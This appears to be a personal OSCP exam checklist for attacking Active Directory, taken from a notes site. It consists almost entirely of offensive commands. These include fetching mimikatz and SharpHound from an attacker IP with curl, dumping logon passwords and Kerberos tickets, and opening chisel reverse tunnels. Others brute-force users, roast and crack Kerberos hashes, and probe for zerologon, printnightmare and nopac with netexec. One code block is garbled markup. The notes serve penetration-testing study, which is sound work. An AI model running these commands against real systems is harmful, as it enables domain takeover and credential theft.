// notes/ Active Directory
🏛️

Checklist

Notes from oscp.adot8.com — active directory.

#active directory#adot8
source · oscp.adot8.com · active-directory/checklist

Checklist

code
01ls C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\

{% hint style="warning" %} Do this for all users on the machine

Also run winPEAS to make sure no sensitive files are missed {% endhint %}

code
01.\chisel.exe client 192.168.45.x:8888 R:9999:socks
02.\chisel.exe client 192.168.45.x:8888 8080:127.0.0.1:80
code
01curl 192.168.45.x/SharpHound.exe -o SharpHound.exe
02.\SharpHound.exe -c all
code
01curl 192.168.45.x/mimikatz.exe -o mimikatz.exe
02.\mimikatz.exe "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "exit"
code
01.\mimikatz.exe "privilege::debug" "token::elevate" "sekurlsa::tickets /export" "exit"
02dir *.kirbi
03kerberos::ptt <ticket>
code
01enum4linux <IP>
02enum4linux -u -p -a -A <IP>
code
01nmap -p 389 --script="ldap* and not brute" -Pn <IP>
code
01 ldapsearch -H ldap://dc.offsec.com -D '' -w '' -b "dc=offsec,dc=com"
code
01 ldapsearch -H ldap://dc.offsec.com -D '' -w '' -b "dc=offsec,dc=com" | grep -i description
code
01netexec smb <IP> -u '' -p '' --shares
02netexec smb <IP> -u '' -p '' --users
03netxec ldap <IP> -u '' -p '' --password-not-required --admin-count --users --groups
04netexec smb <IP> -u '' -p '' --rid-brute
05netexec smb <IP> -u '' -p '' -M spider_plus
06netexec smb <IP> -u '' -p '' -M printnightmare
07netexec smb <IP> -u '' -p '' -M gpp_password
08netexec smb <IP> -u '' -p '' -M spooler
09netexec smb <IP> -u '' -p '' -M nopac
10netexec smb <IP> -u '' -p '' -M zerologon
code
01smbmap -H <IP>
02smbclient -L \\\\<IP>\\ -U '' -N
code
01rpcclient -U '' -N <IP>
02rpcclient -U "username%passwd" <IP>
03querydispinfo
04queryuser joe
05querygroup 0x44f
06querygroupmem 0x44f
code
01kerbrute userenum -d pffsec.lab /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt --dc dc.oscp.exam

{% hint style="info" %} Try sorts of user:user combos, as-rep roasting, bruteforcing etc {% endhint %}

code
01kerbrute bruteuser -d offsec.lab ~/rockyou.txt w.smith
<pre><code><strong>impacket-GetNPUsers -dc-ip &#x3C;IP> -request oscp.exam/-format hashcat </strong>impacket-GetNPUsers oscp.exam/user -dc-ip &#x3C;IP> -format hashcat hashcat -m 18200 crackme.txt ~/rockyou.txt -O -r ~/opt/wordlists/best64.rule -O </code></pre>
code
01impacket-GetUserSPNs oscp.exam/user:pass -dc-ip 192.168.1.129 -request
02hashcat -m 13100 crackme.txt ~/rockyou.txt -O -r ~/opt/wordlists/best64.rule -O
code
01impacket-mssqlclient aerospace.com/discovery:'Start123!'@192.168.193.40
02impacket-mssqlclient aerospace.com/discovery:'Start123!'@192.168.193.40 -windows-auth
code
01bloodhound-python -d offsec.lab -u greg -p pass -ns 192.168.1.129 -c all